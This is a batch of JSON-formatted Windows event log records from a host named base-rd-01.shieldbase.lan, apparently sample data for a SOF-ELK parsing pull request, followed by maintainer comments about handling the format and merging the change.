{"ChunkNumber":18,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER27F3.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_5ecccf33, 0, c664e050-134f-4437-a59f-faf6053fccd9, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"269151","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-06T03:27:23.5765145+00:00","RecordNumber":269151}
{"ChunkNumber":272,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Returning key document for contentid 0116DC02-781B-D1D1-FC1C-C80195511E17\"},{\"@Name\":\"Function\",\"#text\":\"ClipStorage::GetKeyDocumentForContentWithIdAndMinQuality\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\clipstorage.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"272\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"278130","ProcessId":960,"ThreadId":7200,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-07T01:56:10.2943887+00:00","RecordNumber":278130}
{"ChunkNumber":8,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"jobTitle\",\"#text\":\"Microsoft Outlook Offline Address Book 3c9607ed2806b545b1f5456d27735613\"},{\"@Name\":\"jobId\",\"#text\":\"f88b1871-b57c-43cc-9a47-53fe1d131497\"},{\"@Name\":\"jobOwner\",\"#text\":\"shieldbase\\\\tdungan\"},{\"@Name\":\"processPath\",\"#text\":\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\"},{\"@Name\":\"processId\",\"#text\":\"8128\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Bits-Client/Operational","Provider":"Microsoft-Windows-Bits-Client","EventId":3,"EventRecordId":"12477","ProcessId":556,"ThreadId":11288,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Bits-Client%4Operational.evtx","TimeCreated":"2018-09-05T09:47:58.6843438+00:00","RecordNumber":12477}
{"ChunkNumber":70,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"7283","ProcessId":624,"ThreadId":1848,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-10T12:25:25.3832561+00:00","RecordNumber":7283}
{"ChunkNumber":83,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/SubscriptionManager/Subscription\"}]}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"277711","ProcessId":1100,"ThreadId":10548,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-03T10:43:29.3975492+00:00","RecordNumber":277711}
{"ChunkNumber":186,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"\\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=409\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=3367239b-8f30-4f1e-aec8-b9f8c6869c28\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=e666d539-477f-456c-a676-f835fdd52d52\\n\\tPipelineId=5\\n\\tScriptName=\\n\\tCommandLine=, CommandInvocation(Out-String): \\\"Out-String\\\"\\nCommandInvocation(Out-String): \\\"Out-String\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"4725","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T16:32:20.7352615+00:00","RecordNumber":4725}
{"ChunkNumber":19,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"CreatedTaskProcess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"Path\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"ProcessID\",\"#text\":\"7292\"},{\"@Name\":\"Priority\",\"#text\":\"16384\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":129,"EventRecordId":"184051","ProcessId":1484,"ThreadId":12552,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-20T16:28:33.0281318+00:00","RecordNumber":184051}
{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DeviceInstanceId\",\"#text\":\"SWD\\\\PRINTENUM\\\\{149127D4-4FD1-495A-96FF-5C65F6CB2014}\"},{\"@Name\":\"ClassGuid\",\"#text\":\"1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc\"},{\"@Name\":\"Problem\",\"#text\":\"0x2D\"},{\"@Name\":\"Status\",\"#text\":\"0x0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Kernel-PnP/Configuration","Provider":"Microsoft-Windows-Kernel-PnP","EventId":420,"EventRecordId":"580","ProcessId":1744,"ThreadId":1948,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx","TimeCreated":"2018-05-24T23:54:31.1902927+00:00","RecordNumber":580}
{"PayloadData1":"Task \\{18e1f675-3fe3-48f8-aac7-df7236cf7e81}","PayloadData3":"Instance Id ecdb9c2b-33d1-4bf3-ae3f-e7ce551119a6","ExecutableInfo":"Global\\JD_TaskSchedulerSchedule_{F3365228-B5DE-4AA9-A7C2-F36761486253}","MapDescription":"Scheduled task executed","ChunkNumber":84,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionStart\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\{18e1f675-3fe3-48f8-aac7-df7236cf7e81}\"},{\"@Name\":\"ActionName\",\"#text\":\"Global\\\\JD_TaskSchedulerSchedule_{F3365228-B5DE-4AA9-A7C2-F36761486253}\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"ecdb9c2b-33d1-4bf3-ae3f-e7ce551119a6\"},{\"@Name\":\"EnginePID\",\"#text\":\"0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":200,"EventRecordId":"191257","ProcessId":1484,"ThreadId":2000,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-25T10:34:00.5634231+00:00","RecordNumber":191257}
{"ChunkNumber":10,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"LogonType\",\"#text\":\"1026\"},{\"@Name\":\"TaskName\",\"#text\":\"InitializeBrowserSsoCookie\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1193","Channel":"Microsoft-Windows-Shell-Core/Operational","Provider":"Microsoft-Windows-Shell-Core","EventId":62170,"EventRecordId":"3292","ProcessId":15620,"ThreadId":15572,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Shell-Core%4Operational.evtx","TimeCreated":"2018-08-28T21:39:49.1596661+00:00","RecordNumber":3292}
{"ChunkNumber":212,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[1b88] [000001FDF0F559C8:RootMachine] Dispatch       : Root:Valid <- Root:Connect\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class RootMachine,class RootState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"162\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"272470","ProcessId":692,"ThreadId":7048,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-06T07:53:16.6889387+00:00","RecordNumber":272470}
{"ChunkNumber":40,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[15dc] [000001FDF2123B50:558F5D32-0827-EB7B-6AD6-D5DB4138B3AA] StartProcessing: Key:Valid\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class KeyMachine,class KeyState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"154\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"256212","ProcessId":692,"ThreadId":5596,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-03T19:22:50.4790297+00:00","RecordNumber":256212}
{"PayloadData1":"Target: shieldbase\\BASE-RD-01$","PayloadData2":"LogonType 3","MapDescription":"An account was logged off","ChunkNumber":598,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0xA8C0A28\"},{\"@Name\":\"LogonType\",\"#text\":\"3\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4634,"EventRecordId":"53672","ProcessId":772,"ThreadId":5444,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T04:52:52.5911342+00:00","RecordNumber":53672}
{"ChunkNumber":81,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"8290","ProcessId":624,"ThreadId":1380,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-10T22:32:34.5487642+00:00","RecordNumber":8290}
{"ChunkNumber":70,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER27F3.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_5ecccf33, 0, c664e050-134f-4437-a59f-faf6053fccd9, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"272419","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-06T18:28:54.8258888+00:00","RecordNumber":272419}
{"ChunkNumber":13,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"ServiceName\",\"#text\":\"Microsoft Passport\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-HelloForBusiness/Operational","Provider":"Microsoft-Windows-HelloForBusiness","EventId":8025,"EventRecordId":"1954","ProcessId":1064,"ThreadId":11772,"Level":16,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-HelloForBusiness%4Operational.evtx","TimeCreated":"2018-08-31T23:24:32.8544355+00:00","RecordNumber":1954}
{"ChunkNumber":95,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"9686","ProcessId":624,"ThreadId":3132,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-11T14:25:40.3786529+00:00","RecordNumber":9686}
{"ChunkNumber":69,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"7100","ProcessId":624,"ThreadId":1624,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-10T10:43:41.0229266+00:00","RecordNumber":7100}
{"PayloadData1":"PID: 8376","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":102,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"8376\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"16264","ProcessId":8376,"ThreadId":5680,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-05T22:02:07.9866584+00:00","RecordNumber":16264}

[philhagen]

not forgetting this - been on work travel so things are busy. still tracking and aiming to review soon. thx for your patience!

[philhagen]

I just pushed a different implementation to develop that should address this use case. it uses the Ruby script we've implemented elsewhere and this particular source data surfaced a data inconsistency problem (single-element vs array) that should now be gracefully handled. I verified that this properly parsed out all 100 of your samples. before I promote to production, I'll need to do some more testing though.

in the mean time, if you want, switch your /usr/local/sof-elk/ git clone to the develop branch (as root), and reboot the VM to test the staged changes.

[philhagen]

hi, @bedangSen - thank you so much for your patience. after testing the implementation linked above on the develop branch, I'm confident that the ruby-based KV splitter will meet your requirements. I'm going to promote this to production on the public/v20221025 branch, which is used in the latest VM. When that is merged, I'll close this PR, as it's implemented in a manner consistent with the other similar data structures.

I have also kept your implementation handy, as I believe there are some similar requirements upstream that may benefit from that implementation. Thank you for the PR, sample data, and general inputs - these have been immensely helpful!

[philhagen]

This functionality should now be live in public/v20221025 via 1232ff738893aea1323ce3701c0ec594ad566e46. Thank you again for the inputs and help getting this done!

[bedangSen]

Thanks @philhagen! This is awesome!